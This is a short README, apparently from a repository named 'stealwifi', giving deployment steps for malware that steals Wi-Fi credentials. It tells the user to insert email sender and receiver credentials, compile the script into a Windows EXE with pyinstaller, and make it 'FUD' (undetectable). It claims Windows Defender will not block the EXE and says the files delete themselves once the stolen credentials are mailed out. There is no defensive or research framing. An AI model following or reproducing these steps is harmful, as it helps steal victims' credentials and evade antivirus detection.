sercanyilmaz84/stealwifi/README.md

 1) Change sender, reciever and password informations in code,
 2) Use pyinstaller for convert to EXE => pyinstaller stealwifi.py --onefile
 3) If you know how to make FUD malware, u can work on it.
 But, if you convert to EXE directly, Windows Defender will not block EXE file.
+4) You have to write EXE files name in the code, before make EXE file.
+So, when you get creds by mail, all files will be deleted automatically.
 ***********************************************************************
 # AntiScan.Me